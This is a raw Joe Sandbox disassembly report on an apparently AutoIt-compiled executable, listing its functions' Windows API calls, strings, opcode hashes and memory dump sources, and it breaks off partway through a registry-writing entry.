                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                    • String ID:
                                    • API String ID: 2364484715-0
                                    • Opcode ID: ef74a6a96570d1643195f527ccc84e2ea94da6766a58e6a94e0c28aacd2958b1
                                    • Instruction ID: 1eac593acb1e0101c843c8406c16e2065b693e6d013631bda3a6e5f49dbd6ed1
                                    • Opcode Fuzzy Hash: ef74a6a96570d1643195f527ccc84e2ea94da6766a58e6a94e0c28aacd2958b1
                                    • Instruction Fuzzy Hash: 95E01232100209EFCB01DF04EC05E9937B5EB08324F024118BA00872B1D731A9A1EF41
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 0019F5D0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 8bb9a4c04d6339b89dceab67c88dc78deec2a951051dc76d172e8f138579433c
                                    • Instruction ID: 5c7dcefbec572b365ed41d2e934b736469b31e172b3c087a2418dbac2725786d
                                    • Opcode Fuzzy Hash: 8bb9a4c04d6339b89dceab67c88dc78deec2a951051dc76d172e8f138579433c
                                    • Instruction Fuzzy Hash: 48E0177420420DEFCB01DF84EC44E963BA5EB19320F010054FD048B361D771A870DB61
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 0019F5FF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: b305fe5521b2f095e648fb091d99e18c55a33d0c1816b55752cdd442d2a97a72
                                    • Instruction ID: bc5a490fae1082bc0101b4088392e19ebe604b47398e9fa57acf7e6a7e85a224
                                    • Opcode Fuzzy Hash: b305fe5521b2f095e648fb091d99e18c55a33d0c1816b55752cdd442d2a97a72
                                    • Instruction Fuzzy Hash: 40E0177420020DEFCB01DF84EC44E963BA5FB19320F010054FD048B362C772A8B0EBA1
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                      • Part of subcall function 0014B73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0014B72B), ref: 0014B7F6
                                      • Part of subcall function 0014B73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0014B72B,00000000,?,?,0014B2EF,?,?), ref: 0014B88D
                                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0014B2EF,?,?), ref: 0014B734
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                    • String ID:
                                    • API String ID: 2797419724-0
                                    • Opcode ID: 35b4390590d67aa556c5dfa8ecf801c37e0a767c8d61910f8414597c4f306861
                                    • Instruction ID: a0063e9cd60eff2ee4418139dffdfe47723e21a139ff1938e0e13642564910df
                                    • Opcode Fuzzy Hash: 35b4390590d67aa556c5dfa8ecf801c37e0a767c8d61910f8414597c4f306861
                                    • Instruction Fuzzy Hash: 92D0123014430CB7DB142F51EE47F593A1E9B60750F004420B704691E1CBB5A4509564
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: ea90259b5323c82cc558c1ba212cd52f2cce795117a84ca244bddd705a0ed4dd
                                    • Instruction ID: 930e846ead3398aad2b763b7ee5523f13ed2fbafe62d2ba9f572d9a4d1a6b3d9
                                    • Opcode Fuzzy Hash: ea90259b5323c82cc558c1ba212cd52f2cce795117a84ca244bddd705a0ed4dd
                                    • Instruction Fuzzy Hash: 14C04CB5400109DFD755DFD1D9449EEB7BCAB04301F104191A105F1110D7709B859B72
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0015818F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID:
                                    • API String ID: 3964851224-0
                                    Similarity
                                    • API ID: Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 3728558374-0
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 0018A2FE
                                    • DeleteObject.GDI32(00000000), ref: 0018A310
                                    • DestroyWindow.USER32 ref: 0018A31E
                                    • GetDesktopWindow.USER32 ref: 0018A338
                                    • GetWindowRect.USER32(00000000), ref: 0018A33F
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0018A480
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0018A490
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A4D8
                                    • GetClientRect.USER32(00000000,?), ref: 0018A4E4
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0018A51E
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A540
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A553
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A55E
                                    • GlobalLock.KERNEL32(00000000), ref: 0018A567
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A576
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0018A57F
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A586
                                    • GlobalFree.KERNEL32(00000000), ref: 0018A591
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0018A5A3
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,001BD9BC,00000000), ref: 0018A5B9
                                    • GlobalFree.KERNEL32(00000000), ref: 0018A5C9
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0018A5EF
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0018A60E
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A630
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0018A81D
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0019D2DB
                                    • GetSysColorBrush.USER32(0000000F), ref: 0019D30C
                                    • GetSysColor.USER32(0000000F), ref: 0019D318
                                    • SetBkColor.GDI32(?,000000FF), ref: 0019D332
                                    • SelectObject.GDI32(?,00000000), ref: 0019D341
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0019D36C
                                    • GetSysColor.USER32(00000010), ref: 0019D374
                                    • CreateSolidBrush.GDI32(00000000), ref: 0019D37B
                                    • FrameRect.USER32(?,?,00000000), ref: 0019D38A
                                    • DeleteObject.GDI32(00000000), ref: 0019D391
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0019D3DC
                                    • FillRect.USER32(?,?,00000000), ref: 0019D40E
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0019D439
                                      • Part of subcall function 0019D575: GetSysColor.USER32(00000012), ref: 0019D5AE
                                      • Part of subcall function 0019D575: SetTextColor.GDI32(?,?), ref: 0019D5B2
                                      • Part of subcall function 0019D575: GetSysColorBrush.USER32(0000000F), ref: 0019D5C8
                                      • Part of subcall function 0019D575: GetSysColor.USER32(0000000F), ref: 0019D5D3
                                      • Part of subcall function 0019D575: GetSysColor.USER32(00000011), ref: 0019D5F0
                                      • Part of subcall function 0019D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0019D5FE
                                      • Part of subcall function 0019D575: SelectObject.GDI32(?,00000000), ref: 0019D60F
                                      • Part of subcall function 0019D575: SetBkColor.GDI32(?,00000000), ref: 0019D618
                                      • Part of subcall function 0019D575: SelectObject.GDI32(?,?), ref: 0019D625
                                      • Part of subcall function 0019D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0019D644
                                      • Part of subcall function 0019D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0019D65B
                                      • Part of subcall function 0019D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0019D670
                                      • Part of subcall function 0019D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0019D698
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 3521893082-0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0017DBD6
                                    • GetDriveTypeW.KERNEL32(?,001CDC54,?,\\.\,001CDC00), ref: 0017DCC3
                                    • SetErrorMode.KERNEL32(00000000,001CDC54,?,\\.\,001CDC00), ref: 0017DE29
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    APIs
                                    • DestroyWindow.USER32 ref: 0014B98B
                                    • DeleteObject.GDI32(00000000), ref: 0014B9CD
                                    • DeleteObject.GDI32(00000000), ref: 0014B9D8
                                    • DestroyCursor.USER32(00000000), ref: 0014B9E3
                                    • DestroyWindow.USER32(00000000), ref: 0014B9EE
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 001AD2AA
                                    • 6FC70200.COMCTL32(?,000000FF,?), ref: 001AD2E3
                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 001AD711
                                      • Part of subcall function 0014B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0014B759,?,00000000,?,?,?,?,0014B72B,00000000,?), ref: 0014BA58
                                    • SendMessageW.USER32 ref: 001AD758
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001AD76F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DestroyMessageSendWindow$DeleteObject$C70200CursorInvalidateMoveRect
                                    • String ID: 0
                                    • API String ID: 1900234348-4108050209
                                    • Opcode ID: 138c65d4da6935dc9c6a0df4b16431851bf167af2afade6b3f60219b8679834d
                                    • Instruction ID: 0ace6eb5d2042930ed794c463438c30fed049d06f723270e682c9b57452e9fee
                                    • Opcode Fuzzy Hash: 138c65d4da6935dc9c6a0df4b16431851bf167af2afade6b3f60219b8679834d
                                    • Instruction Fuzzy Hash: 5A127E74504601DFDB19CF24E884BA9B7F5BF1A308F144569F98ACBA62C731EC85CB51
                                    APIs
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0019C788
                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0019C83E
                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0019C859
                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0019CB15
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: 0
                                    • API String ID: 2326795674-4108050209
                                    • Opcode ID: b9bc2442059339970c9e84b2dafc93191c01909de6d72a6fbeb90b71f0347fb9
                                    • Instruction ID: c61b51f41af12158a1c4da5a31186832f9b63c3552c0dcd7afbb4ce6c51842c0
                                    • Opcode Fuzzy Hash: b9bc2442059339970c9e84b2dafc93191c01909de6d72a6fbeb90b71f0347fb9
                                    • Instruction Fuzzy Hash: 9EF1BF71604301AFEB258F28CC89BAABBE4FF49354F080629F5D9D62A1D774D984CBD1
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,001CDC00), ref: 00196449
                                    Strings
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 3964851224-45149045
                                    • Opcode ID: f83f42b424b8afb1204549166f0c39b010f487e12211f0845c092609645fb3ad
                                    • Instruction ID: a7061567efe3771e4208cef625b0c75cbbf02e4a2e318c5f18f4c00417d9ad7c
                                    • Opcode Fuzzy Hash: f83f42b424b8afb1204549166f0c39b010f487e12211f0845c092609645fb3ad
                                    • Instruction Fuzzy Hash: 80C174306047458BCF08EF50C591A6E77E5BFA5344F05485DF88AAB3A2DB30ED4ACB92
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 0019D5AE
                                    • SetTextColor.GDI32(?,?), ref: 0019D5B2
                                    • GetSysColorBrush.USER32(0000000F), ref: 0019D5C8
                                    • GetSysColor.USER32(0000000F), ref: 0019D5D3
                                    • CreateSolidBrush.GDI32(?), ref: 0019D5D8
                                    • GetSysColor.USER32(00000011), ref: 0019D5F0
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0019D5FE
                                    • SelectObject.GDI32(?,00000000), ref: 0019D60F
                                    • SetBkColor.GDI32(?,00000000), ref: 0019D618
                                    • SelectObject.GDI32(?,?), ref: 0019D625
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0019D644
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0019D65B
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0019D670
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0019D698
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0019D6BF
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0019D6DD
                                    • DrawFocusRect.USER32(?,?), ref: 0019D6E8
                                    • GetSysColor.USER32(00000011), ref: 0019D6F6
                                    • SetTextColor.GDI32(?,00000000), ref: 0019D6FE
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0019D712
                                    • SelectObject.GDI32(?,0019D2A5), ref: 0019D729
                                    • DeleteObject.GDI32(?), ref: 0019D734
                                    • SelectObject.GDI32(?,?), ref: 0019D73A
                                    • DeleteObject.GDI32(?), ref: 0019D73F
                                    • SetTextColor.GDI32(?,?), ref: 0019D745
                                    • SetBkColor.GDI32(?,?), ref: 0019D74F
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: d1dd5225c4c5821144de2e0b4bc65c05700ed587e6f057c2e7adee0c180e72ce
                                    • Instruction ID: dde1c0b883d61046a5ec7415eca4bb41c82fe7ebec947d433bf3ac73a0b69be5
                                    • Opcode Fuzzy Hash: d1dd5225c4c5821144de2e0b4bc65c05700ed587e6f057c2e7adee0c180e72ce
                                    • Instruction Fuzzy Hash: 0A513A71900208BFDF14AFA8EC48EAE7B79FF08324F114615F915AB2A1E7759A80CF50
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0019B7B0
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0019B7C1
                                    • CharNextW.USER32(0000014E), ref: 0019B7F0
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0019B831
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0019B847
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0019B858
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0019B875
                                    • SetWindowTextW.USER32(?,0000014E), ref: 0019B8C7
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0019B8DD
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0019B90E
                                    • _memset.LIBCMT ref: 0019B933
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0019B97C
                                    • _memset.LIBCMT ref: 0019B9DB
                                    • SendMessageW.USER32 ref: 0019BA05
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0019BA5D
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0019BB0A
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0019BB2C
                                    • GetMenuItemInfoW.USER32(?), ref: 0019BB76
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0019BBA3
                                    • DrawMenuBar.USER32(?), ref: 0019BBB2
                                    • SetWindowTextW.USER32(?,0000014E), ref: 0019BBDA
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: 15f852ce74e9b772b9190ddc716a9a443d0b8186789aeaca0886f80229e85b97
                                    • Instruction ID: 98b705815caaf42b261812ed9f2113853615cbe5ce18084d856daf84bab0ec6c
                                    • Opcode Fuzzy Hash: 15f852ce74e9b772b9190ddc716a9a443d0b8186789aeaca0886f80229e85b97
                                    • Instruction Fuzzy Hash: 06E1AE75904208EBDF249FA1EDC4EEE7B78FF05714F10825AF919AA290D7708A81CF60
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 0019778A
                                    • GetDesktopWindow.USER32 ref: 0019779F
                                    • GetWindowRect.USER32(00000000), ref: 001977A6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00197808
                                    • DestroyWindow.USER32(?), ref: 00197834
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0019785D
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0019787B
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001978A1
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 001978B6
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001978C9
                                    • IsWindowVisible.USER32(?), ref: 001978E9
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00197904
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00197918
                                    • GetWindowRect.USER32(?,?), ref: 00197930
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00197956
                                    • GetMonitorInfoW.USER32 ref: 00197970
                                    • CopyRect.USER32(?,?), ref: 00197987
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 001979F2
                                    Strings
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: bb55797cd801be605ed661822b30b5032b464baced92e8652ad45a7670ef851b
                                    • Instruction ID: 7b1fb5062fabeae2840fc193c00c28b05d5536185c6ff2cb22c586a2ae46e284
                                    • Opcode Fuzzy Hash: bb55797cd801be605ed661822b30b5032b464baced92e8652ad45a7670ef851b
                                    • Instruction Fuzzy Hash: B6B1A071618301AFDB08DF64D989B6EBBE5FF88314F008A1DF5999B291D770E844CB92
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0014A939
                                    • GetSystemMetrics.USER32(00000007), ref: 0014A941
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0014A96C
                                    • GetSystemMetrics.USER32(00000008), ref: 0014A974
                                    • GetSystemMetrics.USER32(00000004), ref: 0014A999
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0014A9B6
                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0014A9C6
                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0014A9F9
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0014AA0D
                                    • GetClientRect.USER32(00000000,000000FF), ref: 0014AA2B
                                    • GetStockObject.GDI32(00000011), ref: 0014AA47
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0014AA52
                                      • Part of subcall function 0014B63C: GetCursorPos.USER32(000000FF), ref: 0014B64F
                                      • Part of subcall function 0014B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0014B66C
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000001), ref: 0014B691
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000002), ref: 0014B69F
                                    • SetTimer.USER32(00000000,00000000,00000028,0014AB87), ref: 0014AA79
                                    Strings
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: 6e40393a5195f1ac908e64be7ccf5ac67af8515ebf12d6eb5a523d6ec7fc82e4
                                    • Instruction ID: 4c3097249f951b9ed406cd05b88feb8623916459ad0033e25027c04dcf241bb8
                                    • Opcode Fuzzy Hash: 6e40393a5195f1ac908e64be7ccf5ac67af8515ebf12d6eb5a523d6ec7fc82e4
                                    • Instruction Fuzzy Hash: CAB14C7564020AAFDB18DFA8DC45BAE7BB4FF08325F124219FA15E72A0DB74D840CB51
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _wcscat$A1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                    • API String ID: 3483108802-1459072770
                                    • Opcode ID: 7f63bc7a0107d55926675a972183e0180affdc83d513ed21de4fa60142a3ca21
                                    • Instruction ID: 6adeaaaa4bea3680f26df0c656c4cf6d0365350c5f6b36bb02752cf87aa47e8d
                                    • Opcode Fuzzy Hash: 7f63bc7a0107d55926675a972183e0180affdc83d513ed21de4fa60142a3ca21
                                    • Instruction Fuzzy Hash: F8410272A00200BBEB05ABA4DC47EBF777CDF65710F04406DFD15AA182EF749A0596A1
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: Window$Foreground
                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                    • API String ID: 62970417-1919597938
                                    • Opcode ID: 57227abdbba11a09a1d622315068ae9882cb11666290bd9e935556091208e317
                                    • Instruction ID: aa87827816511b1bc178516e3eb289b248a7a1ed3ec8fd071576f0044cc14207
                                    • Opcode Fuzzy Hash: 57227abdbba11a09a1d622315068ae9882cb11666290bd9e935556091208e317
                                    • Instruction Fuzzy Hash: 92D1FB30504742EBCB08EF24C981AAEFBB4FF66344F104A1DF459675A1DB70E99ACB91
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00193735
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,001CDC00,00000000,?,00000000,?,?), ref: 001937A3
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001937EB
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00193874
                                    • RegCloseKey.ADVAPI32(?), ref: 00193B94
